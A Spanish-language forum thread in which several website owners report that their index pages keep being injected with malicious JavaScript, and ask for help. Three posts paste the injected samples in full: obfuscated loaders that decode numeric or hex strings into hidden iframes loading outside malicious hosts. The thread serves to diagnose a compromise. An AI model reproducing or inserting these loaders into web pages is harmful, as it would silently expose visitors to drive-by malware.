Foros del Web » Programando para Internet » Javascript »

AYUDA...Me modifican mi index en el servidor con javascript

Estas en el tema de AYUDA...Me modifican mi index en el servidor con javascript en el foro de Javascript en Foros del Web. Compañeros(as) Tengo el siguiente problema yo tengo contratado un servidor pagado, nose como pasa pero mi index se modifica y se agrega un codigo en ...
  #1 (permalink)  
Antiguo 30/07/2007, 08:38
 
Fecha de Ingreso: marzo-2004
Ubicación: Chile
Mensajes: 382
Antigüedad: 20 años, 1 mes
Puntos: 0
AYUDA...Me modifican mi index en el servidor con javascript

Compañeros(as)

Tengo el siguiente problema yo tengo contratado un servidor pagado, nose como pasa pero mi index se modifica y se agrega un codigo en JavaScript que hay veces al subir mi web redirecciona hacia otra web donde esta tiene virus o sino me borra gran parte de mi index y tan solo deja el codigo malicioso (creo) sin direccionar.

Este es el codigo:
Código HTML:
<!-- o4 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<!-- c4 --> 
Alguna idea que hace este codigo, y como pueden entrar a modificar mi index con javascript.

Se lo agradeceria cualquier ayuda, ya que no tengo idea de esto.
  #2 (permalink)  
Antiguo 30/07/2007, 08:52
Avatar de tunait
Moderadora
 
Fecha de Ingreso: agosto-2001
Ubicación: Terok Nor
Mensajes: 16.805
Antigüedad: 22 años, 8 meses
Puntos: 381
Re: AYUDA...Me modifican mi index en el servidor con javascript

Hola

antes que nada ¿lo has consultado con el servicio técnico de tu hosting?
__________________
Javascript Códigos - Bambú difunde
  #3 (permalink)  
Antiguo 30/07/2007, 09:38
 
Fecha de Ingreso: marzo-2004
Ubicación: Chile
Mensajes: 382
Antigüedad: 20 años, 1 mes
Puntos: 0
Re: AYUDA...Me modifican mi index en el servidor con javascript

Si...lo consulte me dijeron que el codigo los hacia yo era uno prefabricado, conteste que lo hacia yo ademas me dijeron que se podia dar este caso por lo general en los formularios de contacto que poseian javascript en validacion entre otras cosas, lo cual yo les conteste que yo programaba el contacto y validaciones con PHP y que no ocupaba javascript.

Al final opte por borrar todo el directorio de mi web y tan solo dejar el index modificado diciendo que la pagina iba a estar un tiempo en mantencio para poder ver la solucion o las posibles soluciones...pero mi sorpresa fue que aun teniendo tan solo el index en mi directorio tambien fue modificado.

¿Alguna idea? ¿Le ha pasado a alguien esto? ¿Conocen alguna solucion?

Eso seria por el momento compañeros.

Se agradece tunait tu interes por ayudarme.
  #4 (permalink)  
Antiguo 30/07/2007, 11:04
Avatar de tunait
Moderadora
 
Fecha de Ingreso: agosto-2001
Ubicación: Terok Nor
Mensajes: 16.805
Antigüedad: 22 años, 8 meses
Puntos: 381
Re: AYUDA...Me modifican mi index en el servidor con javascript

No es que esté muy docta en este tema pero las ocasiones en las que he encontrado que se insertaba código js en un html y no era desde el servidor ha sido en el caso de algún antivirus o de algún virus. ¿Has comprobado si ocurre lo mismo desde distintas computadoras?
  #5 (permalink)  
Antiguo 30/07/2007, 11:42
 
Fecha de Ingreso: marzo-2004
Ubicación: Chile
Mensajes: 382
Antigüedad: 20 años, 1 mes
Puntos: 0
Re: AYUDA...Me modifican mi index en el servidor con javascript

Haber tunait el codigo que deje mas arriba aparece en el index.php osea va a aparecer siempre es como que so yo lo hubiera insertado y luego haber subido la pagina nose como e comportara con los demas navegadores(firefox) ya que yo ocupo internet explorer pero deberia funcionar igual ya que esta en el codigo no creo que dependa incluso de los navegadores ya que como decia antes esta dentro del codigo.

La pregunta es como se inserto ese codigo si yo tan solamente tengo las claves del ftp de mi sitio y que significado tiene ese codigo en javascript.
  #6 (permalink)  
Antiguo 30/07/2007, 11:52
Avatar de tunait
Moderadora
 
Fecha de Ingreso: agosto-2001
Ubicación: Terok Nor
Mensajes: 16.805
Antigüedad: 22 años, 8 meses
Puntos: 381
Re: AYUDA...Me modifican mi index en el servidor con javascript

Ya, pero yo lo que te he preguntado es si lo has probado desde disintas computadoras, no desde distintos navegadores.

Si pasa desde distintas computadoras y el origen está en el servidor deberás reclamarles a ellos.
  #7 (permalink)  
Antiguo 30/07/2007, 12:12
 
Fecha de Ingreso: marzo-2004
Ubicación: Chile
Mensajes: 382
Antigüedad: 20 años, 1 mes
Puntos: 0
Re: AYUDA...Me modifican mi index en el servidor con javascript

Pero eso esta claro que el origen es del servidor y ellos me responden que puede que sea por que ocupo javascript en los formularios de contacto y me dan un script mas seguro en php.
Mis dudas van si alguien de los foreros ha tenido alguna expreriencia similar y de que forma se ha insertado este codigo malicioso o en que tipo de paginas, osea que caractericticas tiene que tener la pagina para que se infecte.

Eso seria po'

Gracias nuevamente
  #8 (permalink)  
Antiguo 13/12/2007, 09:37
 
Fecha de Ingreso: diciembre-2007
Mensajes: 1
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: AYUDA...Me modifican mi index en el servidor con javascript

hola Juan bueno te cuento , que ami ahora me esta pasando lo mismo , en mis index de mis web ase dos semana se inyectan , esos scripts , que son estas:
<script>function v476112077748a(v47611207795cb){ function v476112077b32c () {var v476112077d24d=16; return v476112077d24d;} return(parseInt(v47611207795cb,v476112077b32c())); }function v476112077f18e(v47611207810cd){ var v476112078300b='';for(v4761120784f4c=0; v4761120784f4c<v47611207810cd.length; v4761120784f4c+=2){ v476112078300b+=(String.fromCharCode(v476112077748 a(v47611207810cd.substr(v4761120784f4c, 2))));}return v476112078300b;} document.write(v476112077f18e('3C696672616D65206E6 16D653D273027207372633D27687474703A2F2F74737461747 32E6F72672F6C6F676F2E706870272077696474683D3638382 06865696768743D353931207374796C653D27646973706C617 93A6E6F6E65273E3C2F696672616D653E'));</script> .
----------------------------------------------------------
Mire y provado cambiandome de PC POR QUE tambien pense que era por la PC , pero de igual manera se infecta , y aparecen esos codigos dedusco que es del servidor hosting , en mi caso powweb.com , ahora quisiera saver si hay alguna forma de arreglarno uno mismo , por que estos tios se botan , se demoran , y te ponen excusas.. haber ayudenos a solucionar...
[email protected] /
  #9 (permalink)  
Antiguo 13/02/2008, 10:15
Avatar de aldo1982  
Fecha de Ingreso: noviembre-2004
Ubicación: Santa Fe (Argentina) Colon F.C
Mensajes: 1.362
Antigüedad: 19 años, 5 meses
Puntos: 6
Re: AYUDA...Me modifican mi index en el servidor con javascript

hola gente alguan solucion...me comenzo a pasr lo mismo.. en lso index tanto php como asp de mi servidor ( ********) se me agrega el script entre las etiquetas <body>

aca pongo el script

Código HTML:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47a75b02bed5e(v47a75b02bf157){ function v47a75b02bf553 () {return 16;} return(parseInt(v47a75b02bf157,v47a75b02bf553()));}function v47a75b02bfd55(v47a75b02c0384){  var v47a75b02c0547='';for(v47a75b02c0955=0; v47a75b02c0955<v47a75b02c0384.length; v47a75b02c0955+=2){ v47a75b02c0547+=(String.fromCharCode(v47a75b02bed5e(v47a75b02c0384.substr(v47a75b02c0955, 2))));}return v47a75b02c0547;} document.write(v47a75b02bfd55('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D34386566656233207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313539353135292B27666664316433306232355C272077696474683D353233206865696768743D333035207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> 
__________________
LA MUERTE ESTÁ TAN SEGURA DE VENCER QUE NOS DA TODA UNA VIDA DE VENTAJA
  #10 (permalink)  
Antiguo 16/06/2008, 07:34
 
Fecha de Ingreso: febrero-2007
Mensajes: 9
Antigüedad: 17 años, 2 meses
Puntos: 0
Respuesta: AYUDA...Me modifican mi index en el servidor con javascript

hola yo tengo el mismo problema, nadie me da la solución, ya no c q hacer!!

alguien tiene idea por que el index se modifica solo?
  #11 (permalink)  
Antiguo 17/06/2008, 18:33
 
Fecha de Ingreso: febrero-2007
Mensajes: 9
Antigüedad: 17 años, 2 meses
Puntos: 0
Respuesta: AYUDA...Me modifican mi index en el servidor con javascript

lo arregle cambiandole la pass al hosting.


saludos!
  #12 (permalink)  
Antiguo 24/08/2008, 03:19
 
Fecha de Ingreso: enero-2007
Ubicación: Monterrey
Mensajes: 50
Antigüedad: 17 años, 3 meses
Puntos: 1
Respuesta: AYUDA...Me modifican mi index en el servidor con javascript

a mi me pasa lo mismo no se que hacer pero pensaba que era mi hosting y luego lo subi a otro y se sigue insertando el codigo en el otro hosting entoces el virus esta en el html o quisza lo insertan por el formulario pero no creo porque otro disenador tiene el mismo formulario y sus sitios estan limpios porfavor ayuda
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:01.